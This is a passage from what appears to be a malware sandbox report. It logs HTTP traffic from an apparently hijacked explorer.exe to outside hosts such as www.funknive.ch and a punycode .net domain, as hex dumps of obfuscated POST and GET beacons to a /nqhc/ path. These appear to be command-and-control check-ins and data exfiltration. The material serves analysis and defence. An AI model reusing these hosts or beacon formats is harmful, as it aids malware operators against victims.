tG5IyfgGQejang1TdQTgS8f6Sa44VMnEpH8-T6CWOFVZ5TQIIc72lLUP1sjPP_it9VHyrrDIApQu~hIyQnZlyYaQz4n-QEM4I07VapbCYE9WGAvjIEKWDJkdFLILt_Epj5g_N7PGUP~BPkOMQGfpmU(FP-QZEczIY8YnbL8pIMSv9yCOv0Ng2H~CugxtuBlOD5l4mQ9PLsMS(SrywV9Yj41CqEdbO7A1MI4dvQge9fTZTm1chNjuD2BZ88xF3E(OhyexUB(qIeTMGEtNwEWbOFu2zpqLAfaPqS0xgDr6vbZzI_RSrLRUivRSzG8gmPCuAZlpOSbL0c9CtW7ET-8hQC3_RayeSkBtHTNjuW~cbd8cD5IfvPRdLjX8CwHXukgnkVzD5dAvAlJfzKHCn1KgwFZbgVnvMKvrlLlHUKtU(AaI1WFDrc9KArq-GaWB3r0FtY(qBH6Eknv7kh6TNSe7O9BIutQ5BHjgWBqTVEWmRB9REg0rFpLhC6eByAG7iL8JBK8008lrMDCMCRRzsSYxo-EuePjy4xAvnOu1o6pck4r1Q_AenYgRDKrLjCBVzwTKL4NL0EjzBqEvr8ZLaCYlk6xQpezj9ER74O4GD7~j8YCZt8JffATutZqCuSXmj34CVdT91F4vzXTnWYdKTXOt1CYjFePtmDzMKsXeZbippRtDdjTatt75bsuO9VCWMUqcPbGVOq3BG_jWJN2iecnPB1Rrfl4SM78K~1AIJY2iBwbpWamI~oDvAXG4ywoFG3ECiIUBWS0jVX4VveqDyD5JX9G2srQn9iwf0H1ju_2vrzMzfLSxTHGYP1HvfJOlFcSrHebXsXYZkT7gC4P5kWqhzmeJAE(o3cwj1mlkZij4L0PWjI17MlSC4lEW4pLTbbYaVSR4fnkIj3RDjKg_vqJnlcCPoPavldNmSng-TnLDwpNVs34s9C2HggWoa8SI7fBNTUAmSlx-cJeihFpYnOYoMNLzOVNuMpCquiAdlPKMoI2ZZ2N9ANNVooEo2lcVem5YqkjPWnv9hjY4PLq5eGEFbX2lkiAglqm6097NUklL5RwSKE4224n-pQR9Re0R5lBG2E9TEpq7Uw4zLxz-rGQcEdQmoDenjtNIqW17kCty~4PeNN9UoFK0Y-CQZs5WflhK5hPomwcYMloiZVCsZdBPiW4sq2P5tayT1qZ5oXw0aQqJp4b6Y-k9Gk2WJcJI2Yu_uakRS1NqD4WPHWbyjV5BTzbnbltZC2wg5vDVtt858a8Jlelj0Fx-73HdbIZSLvYcKlAdROqtEC3lozBfftnsUSrwGyXglv9exPEy3nY875jcexE2~IArh4wkjv4j8TN2KFDmJPEple4tISsNIJJ7
                                                                                                                                                                          Dec 5, 2022 15:17:10.719279051 CET11723OUTData Raw: 63 48 65 53 4c 51 4c 38 48 49 42 34 52 51 76 76 48 4b 52 63 39 7e 39 36 66 61 39 7e 51 44 55 43 2d 6f 38 76 46 36 67 28 52 48 6d 6f 32 62 6e 39 6d 75 7a 62 52 6b 6e 52 61 51 6a 69 58 77 5f 75 5f 45 52 59 5a 4e 45 62 45 72 63 37 64 4b 61 64 61 6b
                                                                                                                                                                          Data Ascii: cHeSLQL8HIB4RQvvHKRc9~96fa9~QDUC-o8vF6g(RHmo2bn9muzbRknRaQjiXw_u_ERYZNEbErc7dKadakUDbRncF1MKndxcvMtheZh4Cae4fwZTR(-NB6_X9hA472VwDN7MPKCDx8crig7Cd(EB1vvVHctTrAFyfuFoC~Q9C8pqN3Gimv8w6vKwcCnvx2KmdRFXUrfKqgH~HWo4KgwI4pp2TLMuNDh~_Zk7F8O2xcOoEQN2vFY
                                                                                                                                                                          Dec 5, 2022 15:17:10.736150026 CET11723INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:17:10 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Location: https://www.funknive.ch/nqhc/
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                          Dec 5, 2022 15:17:10.736351967 CET11726OUTData Raw: 33 72 48 32 64 7a 44 32 4a 65 32 64 64 4b 62 52 6e 31 78 51 65 67 68 58 58 66 51 43 62 75 65 73 45 48 42 6d 65 4d 6a 4f 5a 67 5f 78 53 71 52 32 65 58 79 72 33 63 32 6a 77 36 35 31 33 6f 66 78 76 4c 77 47 64 30 70 54 30 4e 45 41 2d 5a 69 35 39 69
                                                                                                                                                                          Data Ascii: 3rH2dzD2Je2ddKbRn1xQeghXXfQCbuesEHBmeMjOZg_xSqR2eXyr3c2jw6513ofxvLwGd0pT0NEA-Zi59iRJViJqsAinEnaWKnnL0ba~WvG52RVqc~YC6kQbYiYB8ljI93DJ4NkZbzPV2MEqZaWgn2Rq8bDpQ(0XCKERROpdYVn6tzCLREqn9a9kNy6KNh7lYFbutuGdlzeBbM3OP~JOxHruJcer5tcvATffDieCFegU3nax1ff
                                                                                                                                                                          Dec 5, 2022 15:17:10.736454964 CET11730OUTData Raw: 6d 75 4b 4a 50 34 30 6f 50 74 66 78 56 7e 6f 31 66 55 30 31 44 74 76 6e 51 45 4e 35 6d 52 5f 4e 48 6f 2d 38 35 4b 72 42 68 63 72 56 68 30 78 6f 39 70 45 42 34 54 4d 32 33 64 5a 47 56 77 79 77 37 4a 6d 69 67 30 42 52 47 28 30 34 43 57 74 32 2d 32
                                                                                                                                                                          Data Ascii: muKJP40oPtfxV~o1fU01DtvnQEN5mR_NHo-85KrBhcrVh0xo9pEB4TM23dZGVwyw7Jmig0BRG(04CWt2-2L8erVZbgdhhi3(TKdvpkvJECcwPjEcSZSU2RmOPe4(4D8lG2WqIhwWt6Q5sqVJjMgmkL9EA7FVcdjCduzvwZdrz49bNv0SD7Ksj(FJ0AUVzluGwKH4FPV2FsrtQ71(7sqn6E_jK~ekGqJLcmOCmsMAGgbMscSiA~a
                                                                                                                                                                          Dec 5, 2022 15:17:10.736517906 CET11736OUTData Raw: 39 78 42 28 53 43 4f 66 77 50 38 57 6a 45 78 61 43 4f 61 66 43 45 47 67 6b 28 57 51 49 5a 69 4b 43 72 63 35 67 6d 74 71 69 50 6f 63 7a 54 36 67 46 73 72 6f 37 7e 6a 5a 42 59 5f 74 5f 6d 74 7e 4d 62 44 72 74 54 2d 71 52 70 57 43 31 32 66 53 78 58
                                                                                                                                                                          Data Ascii: 9xB(SCOfwP8WjExaCOafCEGgk(WQIZiKCrc5gmtqiPoczT6gFsro7~jZBY_t_mt~MbDrtT-qRpWC12fSxXz3IHD8EscmYdFeerO5fCNX0i0A59bKAaQhu4V(KxmhpkHEN1m0S~CI1KAj_wq2wM77LkyjXgI7IGI1IRq(DFT~axRwcMiMD7TLGk9XSBvF_S9fwg4dkTiODfXjrsIQhQsi74IXhx_wo4wwCcxOapdfRiAkvm5XIBh
                                                                                                                                                                          Dec 5, 2022 15:17:10.736862898 CET11741OUTData Raw: 36 28 63 59 4c 70 39 65 47 54 46 41 31 43 4f 4e 47 73 49 59 45 35 45 41 58 55 45 6b 56 38 38 50 53 5a 78 33 41 32 51 57 34 78 45 66 33 35 4c 42 66 73 5a 79 45 32 78 48 72 49 6b 38 77 57 79 6f 6c 34 46 63 7a 72 32 67 56 44 49 70 61 49 42 72 58 41
                                                                                                                                                                          Data Ascii: 6(cYLp9eGTFA1CONGsIYE5EAXUEkV88PSZx3A2QW4xEf35LBfsZyE2xHrIk8wWyol4Fczr2gVDIpaIBrXAu9pREt1VI3oeGMv1_QPEJpvUi48rwjIwK(F(rt5JbdkuoInW4DDr-nZJuXFN7NgdOpGHnkGo26s45tDuAnNAsGz(tl5RW0nPodjgXikaf4hoHG8cgJ6Vk6B6FtIOvdSgR8N0PPe0DP560OL(0M7e_~ipSZWpwM1ze
                                                                                                                                                                          Dec 5, 2022 15:17:10.737035990 CET11749OUTData Raw: 52 46 75 7a 7a 68 36 6a 2d 55 36 69 72 6b 57 39 42 77 31 45 61 31 31 43 42 63 71 62 62 58 4e 32 35 62 62 6d 69 4f 69 47 66 6b 74 54 78 78 41 59 57 6d 6a 56 31 63 4d 63 6a 28 4c 56 55 30 43 65 6e 4a 35 6d 66 64 32 6e 4b 36 7a 6b 69 4d 78 58 31 4f
                                                                                                                                                                          Data Ascii: RFuzzh6j-U6irkW9Bw1Ea11CBcqbbXN25bbmiOiGfktTxxAYWmjV1cMcj(LVU0CenJ5mfd2nK6zkiMxX1OJha4_pk1k5fzUsHc5pCZGLe5fo8VLAd269PUlDARMG37W7Ud8mmDCLJaVR7usHihU8muAZGUPjXxTjI1Vyv195Fd_w2aZt8hfDWldzJ~2vEOqDYI4ecaF91neF1dIeL3eh-cdWpF5nZxig3m1aTz4FZSrW9UIuWl8
                                                                                                                                                                          Dec 5, 2022 15:17:10.753657103 CET11753OUTData Raw: 5f 69 49 36 31 36 35 4b 62 6b 4d 4e 66 46 37 31 4a 65 51 76 37 7a 53 65 67 4a 38 77 6c 4a 39 54 57 68 63 53 63 28 33 74 42 63 37 71 46 69 7a 33 63 6b 48 69 53 68 6f 6a 6b 75 36 46 36 62 53 36 46 4b 33 36 6a 57 75 38 37 79 42 71 7a 38 53 4d 50 28
                                                                                                                                                                          Data Ascii: _iI6165KbkMNfF71JeQv7zSegJ8wlJ9TWhcSc(3tBc7qFiz3ckHiShojku6F6bS6FK36jWu87yBqz8SMP(KJgxsNPET1Q9ynE7s1x0HrizY0h~vyHWPRHX7N20Bt7IKVa6i4PXt2AEym_FZ6A(MhYy2xVRsF0hAu_mZ1HNwO47HF7O_m3lCxdn4(y718n6-x2W64JWK2HO9ljW-sTSXxHMlM3zYJLciWs71N2nqKKnRyLVubtKc
                                                                                                                                                                          Dec 5, 2022 15:17:10.753758907 CET11754OUTData Raw: 37 61 4d 49 6b 35 59 64 74 48 36 4d 57 44 4a 6c 61 4f 39 57 43 48 52 75 7a 44 71 6b 65 74 7a 6b 75 41 65 53 4e 39 45 78 74 36 43 36 50 78 7a 63 4d 37 70 6a 4c 6a 67 70 44 4c 35 61 70 6a 34 67 75 44 58 59 58 59 4d 6c 31 69 32 75 63 74 42 65 4a 32
                                                                                                                                                                          Data Ascii: 7aMIk5YdtH6MWDJlaO9WCHRuzDqketzkuAeSN9Ext6C6PxzcM7pjLjgpDL5apj4guDXYXYMl1i2uctBeJ2vrl5pYT2E6XjT(rO5t61rp4p2e16RqSdkF-NaE7HSpWyVQm9MdGnCeX4BCRgs5keDO8vXCJFrbOhF6VVS5cUOMe~3Tc~MiN2BGhyT5oGa(LSNxXU6toOPYskvErnHO0XlVUbaV08pBOeDPU(OOnzPI7BYPS~o7JSL
                                                                                                                                                                          Dec 5, 2022 15:17:10.753804922 CET11758OUTData Raw: 6a 75 48 32 39 55 58 6a 34 59 58 75 55 57 78 79 33 52 33 4c 54 35 56 4e 43 75 32 4d 6e 39 6a 54 53 6a 7a 52 57 79 70 30 5a 64 59 42 30 36 38 49 52 55 77 37 49 76 6e 6a 34 6f 4f 6f 59 43 52 49 70 61 32 46 71 34 54 66 76 28 72 7e 76 79 37 4e 6e 6b
                                                                                                                                                                          Data Ascii: juH29UXj4YXuUWxy3R3LT5VNCu2Mn9jTSjzRWyp0ZdYB068IRUw7Ivnj4oOoYCRIpa2Fq4Tfv(r~vy7NnkzsWmsL07L8fcHp1y4be2K1156P7F4q724JkAPuhmKW0S8iIbwnmAjN7kTmhzch2P4X9eSkebHNpc_38ltZrlansy2Pw8q1DJkWMgJBXtTOOGf0Pob2e(QxD4SBOWI1mzSnpx9Q05MNmwcgdEUdza8KDG4GhXd5RKr
                                                                                                                                                                          Dec 5, 2022 15:17:10.753983021 CET11763OUTData Raw: 67 77 56 38 2d 6e 77 69 54 45 77 36 72 61 62 76 6c 50 67 63 34 55 42 35 79 41 64 4e 33 6f 37 37 73 5a 6b 32 73 64 6f 6b 78 67 33 6f 50 6b 79 45 6a 6e 76 42 4f 76 34 42 71 49 70 34 63 71 38 36 70 74 48 70 6f 6e 44 35 33 31 51 6f 51 65 39 77 50 71
                                                                                                                                                                          Data Ascii: gwV8-nwiTEw6rabvlPgc4UB5yAdN3o77sZk2sdokxg3oPkyEjnvBOv4BqIp4cq86ptHponD531QoQe9wPq9Z9UxK_9lLLJVua9zaAYkes30MUsJHa8ftjNlG1LHWt5K0AqNfTTrS-Nn0ilwlsyezSDRy3mtvcFm0dBdsYI1igw_N9YJQukLhgWNrbLtbYPgQl7pwAK7PNnYYrqLHqUp2zSj0OE5KA55BT07tKuGDoHady955ImR


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          42192.168.11.2049883185.101.158.23980C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:17:12.752525091 CET11764OUTGET /nqhc/?7nWHV=sPoIw5t6pqr53t/oApVsYQPYeQSIkYstTEU7jq7wUoyBdiYMXjDOpQvDe6hGJRv5cGRC4OofJ74gnHLDZXk1GBAfNVZPB7Yr2A==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.funknive.ch
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:17:12.769244909 CET11764INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:17:12 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Location: https://www.funknive.ch/nqhc/?7nWHV=sPoIw5t6pqr53t/oApVsYQPYeQSIkYstTEU7jq7wUoyBdiYMXjDOpQvDe6hGJRv5cGRC4OofJ74gnHLDZXk1GBAfNVZPB7Yr2A==&t0D=yFNHS0IX
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          43192.168.11.204988550.87.192.14480C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:17:26.448947906 CET11772OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.xn--29-oj9ik7b890b.net
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.xn--29-oj9ik7b890b.net
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.xn--29-oj9ik7b890b.net/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 56 72 70 38 63 62 49 45 70 59 55 42 65 6b 59 75 6a 4a 7e 35 6c 71 64 30 52 6b 4d 59 64 4c 28 34 4e 50 69 44 54 33 55 41 44 4b 7e 33 45 44 73 37 6c 6a 74 4e 65 36 28 6d 77 56 61 51 53 51 59 35 4d 32 77 6e 56 6a 56 31 78 61 66 53 6e 6b 65 71 31 4e 50 55 50 43 47 79 36 77 45 39 69 78 5a 4b 4c 6e 51 42 7e 59 6e 7a 48 77 69 67 57 42 35 57 72 67 68 71 50 65 68 34 4e 42 63 31 70 57 4c 57 47 64 65 39 34 44 66 76 77 68 69 54 45 38 4d 54 49 41 45 4b 52 39 72 78 59 6f 62 6e 33 61 6b 2d 7a 78 4e 57 55 72 53 50 79 7a 5a 44 77 57 4a 43 51 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=Vrp8cbIEpYUBekYujJ~5lqd0RkMYdL(4NPiDT3UADK~3EDs7ljtNe6(mwVaQSQY5M2wnVjV1xafSnkeq1NPUPCGy6wE9ixZKLnQB~YnzHwigWB5WrghqPeh4NBc1pWLWGde94DfvwhiTE8MTIAEKR9rxYobn3ak-zxNWUrSPyzZDwWJCQA).
                                                                                                                                                                          Dec 5, 2022 15:17:26.825609922 CET11774INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:17:26 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                          Link: <http://xn--299aa717y.xn--3e0b707e/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                                                          Content-Length: 11649
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6d 8f ec c8 75 de 67 cd af a8 db 8b dd 99 96 ba d8 24 fb bd 7b 7a 64 ed 6a b5 16 a2 b5 85 bd 2b 1b 81 56 b8 a8 26 0f c9 da 29 56 d1 c5 e2 74 f7 8e 07 10 10 c7 f0 1b 9c 04 96 61 23 90 02 1b 88 e1 04 f9 22 24 0a a0 0f 49 7e 90 f6 ea 3f e4 14 d9 ef c3 9e e9 3b f7 5e 19 89 76 5e 48 d6 a9 73 9e f3 9c e7 3c 97 cf be fd fb 1f 7c fa af bf ff 21 49 4c 2a ae ce 2e ed 8b 08 26 e3 69 e3 5a d1 7f f5 49 c3 c6 80 85 57 67 5f bb 4c c1 30 12 24 4c e7 60 a6 8d 1f 7c fa 1d 3a 6c 90 f6 e6 46 b2 14 a6 8d 1b 0e f3 4c 69 d3 20 81 92 06 24 66 ce 79 68 92 69 08 37 3c 00 5a 1e 5a 84 4b 6e 38 13 34 0f 98 80 a9 57 e2 ec c0 9c 6b 35 53 26 3f df 80 9c 4b c5 65 08 8b 16 91 2a 52 42 a8 f9 79 59 62 b8 11 70 f5 eb bf fe fb 97 3f fb c5 cb 7f fe f1 97 ff f4 bf c8 cb 9f ff 9f 97 3f fb 13 f2 f2 cf fe 9e bc fc bb 3f 7d f9 b3 bf 22 ef bd 33 f4 3d 6f 42 62 15 2b a3 b2 cb 76 55 75 76 29 b8 bc 26 1a c4 f4 3c 94 39 cd 34 44 60 82 e4 9c 24 f8 35 3d 6f b7 17 92 52 7f 34 62 6c e0 0d 96 8e 3d 75 c0 9d 0d dc 01 54 dd 37 f5 0d 26 0c 68 c9 0c 34 88 59 66 a8 03 cb 32 c1 03 66 b8 92 6d 9d e7 df 58 a4 02 af 6c df 69 63 c5 83 bc a7 d9 1f 15 6a 42 7e fd 93 ff f5 e5 df fc b4 51 b5 6d 24 c6 64 e3 87 7a b7 23 80 b0 dd 78 93 0c be fc ab bf f9 d5 2f 7f fc ca 44 02 95 a6 b8 9d 7c 97 51 1e 68 9e 99 ab b3 39 ee 4b cd 9d 17 f3 0c 52 f5 39 7f 0e c6 70 19 e7 64 4a 6e 1b 33 96 c3 0f b4 68 8c cb 1e f9 f8 b3 f6 67 ed dc 99 3b 4a c7 9f b5 79 ca 62 c8 3f 43 70 0d 9f b5 cb e2 cf da 5e d7 71 1d f7 b3 f6 c0 5f 0c fc cf da 8d 56 03 16 06 eb 9d 4c c6 78 c8 6f e2 a7 e1 61 61 89 86 ef 0f 2b 40 fc b2 67 55 e8 00 1a e3 db 06 3a 10 45 2c cb 56 f8 25 fc 71 55 3e 6b cf 33 ca 65 20 8a d0 b6 fd 3c 2f 03 25 00 c5 4d 01 ce ee a4 5c 3a 9f e7 df bc 01 3d ed 3b 9e e3 35 ee ee 26 67 ed af 3f 23 9f 26 3c 27 11 17 40 f0 cd 0a a3 68 0c 12 34 12 08 c9 d7 db 67 cf a2 42 06 76 a3 17 d0 62 2d d3 bc bd 61 9a c8 96 6e a9 16 9f 32 27 d0 80 99 1f 0a b0 5b b9 68 04 4c de b0 bc d1 6c 65 53 ee c4 60 3e 50 d2 a0 6c ef bd b7 7b ba 68 f8 61 a3 39 59 03 93 1c a1 57 c0 6c fa dc 68 5c 9a 13 69 95 7e 90 30 fd 81 0a a1 05 d3 8b cc 09 70 0e fd 09 04 e6 c2 6d b9 2d ee cc 79 68 12 7c 27 c0 e3 c4 60 47 07 87 10 9f 5a 7c e6 58 27 2e 2f 0c 8e d6 82 26 a6 bb 4d cc 34 ea db cc b0 1f 7c f2 bd 8b 66 73 a2 c1 14 5a 92 a7 e3 9a 15 2e 4c a7 d3 3d ec bb cd 60 c1 05 54 63 99 fb 4a 55 a6 45 19 8c 93 eb
                                                                                                                                                                          Data Ascii: rmug${zdj+V&)Vta#"$I~?;^v^Hs<|!IL*.&iZIWg_L0$L`|:lFLi $fyhi7<ZZKn84Wk5S&?Ke*RByYbp???}"3=oBb+vUuv)&<94D`$5=oR4bl=uT7&h4Yf2fmXlicjB~Qm$dz#x/D|Qh9KR9pdJn3hg;Jyb?Cp^q_VLxoaa+@gU:E,V%qU>k3e </%M\:=;5&g?#&<'@h4gBvb-an2'[hLleS`>Pl{ha9YWlh\i~0pm-yh|'`GZ|X'./&M4|fsZ.L=`TcJUE
                                                                                                                                                                          Dec 5, 2022 15:17:26.825725079 CET11775INData Raw: 60 8a 0a 38 21 44 b8 1d e3 98 65 06 d3 86 55 aa fd 39 43 39 ab cc 16 b3 12 ae ea f3 f7 97 9f b2 f8 f7 58 0a 17 8d 04 18 ca f9 43 f7 47 96 1d c8 f0 83 84 8b f0 c2 20 0f a5 2f d4 f4 5b 5a b3 e5 45 23 12 cc ba ac 72 55 13 bb e5 45 96 29 6d f2 e9 2d
                                                                                                                                                                          Data Ascii: `8!DeU9C9XCG /[ZE#rUE)m-)8"|1~Sw/#@&o|E[4oytVf>&HpvK;Ve4w]L4p{fV?h8h{ngn5zG{7yguzV?lMY
                                                                                                                                                                          Dec 5, 2022 15:17:26.825814962 CET11776INData Raw: 51 07 ef 25 39 09 cb e9 76 19 b7 19 0b 43 2e e3 b1 e7 f8 3d 48 89 ef 74 06 f8 9e a4 4c c7 5c 52 a3 b2 b1 bb 3e cc 14 72 4c c7 ee 23 9c 12 60 16 71 9f 4d e2 1d 34 6e 25 fe bd 48 e7 5e a4 7b 2f d2 bb 17 e9 9f 36 d2 23 ac 51 1b 16 a3 e3 93 03 15 79
                                                                                                                                                                          Data Ascii: Q%9vC.=HtL\R>rL#`qM4n%H^{/6#QyN*.mpW9B0}*KWvP,+-3TPqunc@FB13~tq$81c?s;A%RF3GJ"@,h.xuCwj<O@E
                                                                                                                                                                          Dec 5, 2022 15:17:26.825880051 CET11778INData Raw: f7 f3 f3 8c 05 40 67 60 e6 00 f2 5e dd de ed 9d 93 07 1a df 28 09 0b d1 35 56 af db 99 d2 f8 3d 76 27 81 e0 d9 58 a3 36 17 5e b6 68 ed fc 37 cb 2b 9a 31 93 8c b9 c4 f5 5e f4 dc 77 9b 93 04 2c d3 31 26 4c 52 74 21 97 63 6a bf d5 0d e8 48 a8 f9 38
                                                                                                                                                                          Data Ascii: @g`^(5V=v'X6^h7+1^w,1&LRt!cjH8ar02~fi54S0iH#V.9PB;aVs-vUvM0*l-AbM=d*nF|x],B4+.[0%c?wIpQ
                                                                                                                                                                          Dec 5, 2022 15:17:26.825943947 CET11779INData Raw: c3 ca b9 0c ff b7 be ab 01 3c 9a 7b 32 7c 0e 81 92 e8 b5 e5 e3 e8 9b d4 93 c1 0d 68 c3 4f c2 5e 67 3e b0 1e cd 53 4c 78 5c 93 fa c4 d3 80 1f 52 a3 36 ef 34 d8 07 74 a8 4b bb 07 1a 29 69 68 ce bf 40 d8 3c 65 42 8c 89 a7 21 3d 9e 94 42 c8 8b 14 b3
                                                                                                                                                                          Data Ascii: <{2|hO^g>SLx\R64tK)ih@<eB!=B=)Nyuf X][s3o)Xy/siL*z_py1`Fbm>Q3Te>g2o`VHS>`0B=(1y 'U<Pcx^s""u0y.cJ}wL\
                                                                                                                                                                          Dec 5, 2022 15:17:26.826006889 CET11780INData Raw: 4d f2 8c a7 99 d2 86 49 b3 c2 08 96 4c e2 65 c1 f3 84 a2 e4 cb 13 e1 0e cb 6a 90 e7 09 37 70 22 5c 99 5b 83 91 31 01 34 c3 5d 9d 88 b3 c9 af c1 ba e1 37 3c a4 1a c2 13 b1 36 f9 35 58 a2 48 b9 54 c5 1a 14 97 23 e3 53 67 ad ad 7d bc 07 4b 67 e8 c8
                                                                                                                                                                          Data Ascii: MILej7p"\[14]7<65XHT#Sg}Kg'(K:XodjevUGqBg@Hi*6XpJhh2<u)UvNH,uZb5k<fjrVopDsCg\N7TC
                                                                                                                                                                          Dec 5, 2022 15:17:26.826105118 CET11782INData Raw: 4d cf 51 dd 73 d2 46 86 79 a0 79 66 08 aa 7c 62 4b 2e 03 51 84 d8 6c 86 5b b9 ce db 92 dd f0 98 19 ae 64 fb 86 c3 dc 49 b9 74 3e af 1a 06 7e b7 d3 71 a3 7e a7 17 f5 82 d9 28 ec 81 0b d5 f4 88 53 96 d3 6d 35 b5 d5 f4 f3 fc fc 0a e5 2b 49 bd 05 76
                                                                                                                                                                          Data Ascii: MQsFyyf|bK.Ql[dIt>~q~(Sm5+Iv4U!y?Y;|X~T^^:N**%n[MSkf`C8il$rd2vrt$zZs|1eRu~cF'}z;,YdIMMwy$ 7uw+
                                                                                                                                                                          Dec 5, 2022 15:17:26.826204062 CET11783INData Raw: ca ef bf 11 bf cf 50 46 aa 50 b0 18 7e 6b ed be 6b 76 7f d0 db b3 ed c3 06 77 9d 3e 56 74 7b 2b 04 ff 64 bf 0f ef f9 dd 1b f5 dd c1 b0 db f1 3a 03 bf b7 83 f3 ad 07 70 bc 15 d5 76 8d 3c 1b cd d0 33 40 b8 f4 a7 8d e7 aa d0 01 7c a4 59 96 f0 a0 41
                                                                                                                                                                          Data Ascii: PFP~kkvw>Vt{+d:pv<3@|YAT.W0zQ9dcq=yQ:n4=jQbdCO)?#aq"A"nxg\pr%" 2cBG-&DoQyFBG#!!e?cuu
                                                                                                                                                                          Dec 5, 2022 15:17:26.826313972 CET11784INData Raw: f2 d5 30 85 ca 4b 07 cf b8 0c 01 e7 a0 de fd e5 94 49 15 f6 2b 81 87 9c 09 15 d7 f9 67 c5 d4 e2 ed 1a 6f df 63 5f fe e5 7f 2b 3d 56 4b e7 d5 9d 57 8d 5a f9 ea 89 06 3a 62 c7 d3 7c 95 31 93 10 5c d6 c7 5e 87 78 9e 33 14 7d c7 a3 7d a7 43 3d 6a df
                                                                                                                                                                          Data Ascii: 0KI+goc_+=VKWZ:b|1\^x3}}C=j;>b>={*sT>/mT_ 6q:c1PsL:/_RR*Ir}<&)hjUe6xBpy}QI?16K:?l3Zp|b#v^v
                                                                                                                                                                          Dec 5, 2022 15:17:26.826380014 CET11785INData Raw: fe dd d9 63 2a 8c 23 15 14 f9 4a 0b 16 5c 5b e7 ca 10 5d 2d 14 aa f2 0e 00 ec 08 c3 0a a3 0e 19 ed 48 22 95 5c 65 af aa bb dd 6e 79 0e 79 9e 09 b6 1c 93 d2 cc 65 28 52 d2 a0 ab bf 00 1c 06 d2 3d 09 6d 97 32 20 20 c2 63 6f 35 2b 0e 00 74 9d 53 4d
                                                                                                                                                                          Data Ascii: c*#J\[]-H"\enyye(R=m2 co5+tSMjJ(*]7+U7\@HTJ-Kk]4~^h*0MC?E!S)HQz:Lr2.Ie|3wC#fT&A: )V


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          44192.168.11.204988650.87.192.14480C:\Windows\explorer.exe
